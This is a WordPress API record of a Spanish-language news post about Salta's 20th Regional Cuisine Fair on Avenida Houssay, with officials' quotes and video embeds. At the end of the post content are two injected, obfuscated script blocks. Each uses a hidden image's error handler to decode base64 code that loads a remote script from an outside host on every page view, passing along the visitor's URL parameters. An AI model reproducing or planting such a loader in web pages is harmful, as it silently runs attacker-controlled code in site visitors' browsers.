{"id":1462,"date":"2022-09-09T12:31:58","date_gmt":"2022-09-09T15:31:58","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1462"},"modified":"2025-08-14T00:35:51","modified_gmt":"2025-08-14T03:35:51","slug":"la-municipalidad-la-declaro-de-interes-cultural-y-turistico-las-actividades-comenzaran-a-partir-de-las-11-en-avda-houssay-ya-hay-mas-de-50-inscriptos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1462","title":{"rendered":"La Municipalidad la declar\u00f3 de inter\u00e9s cultural y tur\u00edstico. Las actividades comenzar\u00e1n a partir de las 11, en Avda. Houssay. Ya hay m\u00e1s de 50 inscriptos."},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#880727\"><strong><em>La Municipalidad la declar\u00f3 de inter\u00e9s cultural y tur\u00edstico. Las actividades comenzar\u00e1n a partir de las 11, en Avda. Houssay. Ya hay m\u00e1s de 50 inscriptos.<\/em><\/strong><\/h3>\n\n\n\n<p>La Municipalidad, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, declar\u00f3 de Inter\u00e9s Cultural y Tur\u00edstico la Feria de la Cocina Regional, que realiza la Fundaci\u00f3n Sentimiento desde hace 20 a\u00f1os.<\/p>\n\n\n\n<p>Este domingo 11, a partir de las 11, se llevar\u00e1 a cabo sobre la avenida Houssay de barrio Casta\u00f1ares la 20ma. edici\u00f3n de la Feria de la Cocina Regional que organiza la Fundaci\u00f3n Sentimiento con el respaldo y acompa\u00f1amiento del municipio.<\/p>\n\n\n\n<figure class=\"wp-block-embed alignleft is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Mario Siares, Presidente de la Fundaci\u00f3n Sentimiento\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/Pe298QluvBI?start=6&#038;feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>En la oportunidad, habr\u00e1 un festival folkl\u00f3rico con artistas como el Grupo Vira Vira, El Talero Blanco, Los Aimo, Grupo Bellacos, entre otros.<\/p>\n\n\n\n<p>Hasta el momento hay inscriptos m\u00e1s de 50 participantes, que elaborar\u00e1n y ofrecer\u00e1n a la venta empanadas,&nbsp;tamales y locro y tambi\u00e9n postres regionales.<\/p>\n\n\n\n<figure class=\"wp-block-embed alignright is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Subsecretar\u00edo Contreras en lanzamiento XX edici\u00f3n Feria comida regional\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/emn3DvU1kwI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>En la conferencia de presentaci\u00f3n de la Feria, desarrollada esta ma\u00f1ana, el subsecretario de Turismo de la Municipalidad, Juan Manuel Contreras, expres\u00f3 su agradecimiento a los organizadores por esta nueva edici\u00f3n recordando que \u00aben el marco de la Hora de los barrios, como platea la intendenta Bettina Romero,&nbsp; es un honor acompa\u00f1arlos&nbsp; y ser parte de las actividades,&nbsp; ya que nuestra gastronom\u00eda forma parte de la cultura y para los turistas es nuestro emblema,&nbsp; parte de nuestra identidad\u00bb.<\/p>\n\n\n\n<p>La resoluci\u00f3n que declara de Inter\u00e9s&nbsp;Cultural y Tur\u00edstico Municipal a la 20ma. edici\u00f3n de la Feria de la Cocina Regional, lleva el n\u00famero 67.<\/p>\n\n\n\n<figure class=\"wp-block-embed alignright is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Duo SACTA en el lanzamiento de la xx edici\u00f3n Feria de comida regional\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/QeoZqIyrnUw?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>La feria es coordinada en la actualidad por Mario Siares, hijo, quien se\u00f1al\u00f3: \u00abqueremos agradecerle a la Municipalidad de Salta y a la Secretaria de Cultura y Turismo por el apoyo que recibimos para esta actividad, realmente es el empuj\u00f3n y el respaldo que uno necesita para realizar este tipo de actividades. Invitamos a todos vecinos y turistas a esta Feria de Comida Regional,\u00a0bien salte\u00f1a con rica comida y buen folklore a cargo de artistas amigos. La entrada es libre y gratuita con precios regulados\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/prensa.municipalidadsalta.gob.ar\/el-domingo-11-se-realiza-la-edicion-n20-de-la-feria-de-la-cocina-regional-de-castanares\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_16-8-2022_103914_prensa.municipalidadsalta.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-1308\" width=\"141\" height=\"63\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Municipalidad la declar\u00f3 de inter\u00e9s cultural y tur\u00edstico. Las actividades comenzar\u00e1n a partir de las 11, en Avda. Houssay. Ya hay m\u00e1s de 50 inscriptos. La Municipalidad, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, declar\u00f3 de Inter\u00e9s Cultural y Tur\u00edstico la Feria de la Cocina Regional, que realiza la Fundaci\u00f3n Sentimiento desde [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1463,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,18],"tags":[],"class_list":{"0":"post-1462","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1462"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1462"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1462\/revisions"}],"predecessor-version":[{"id":7356,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1462\/revisions\/7356"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1463"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1462"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1462"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1462"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}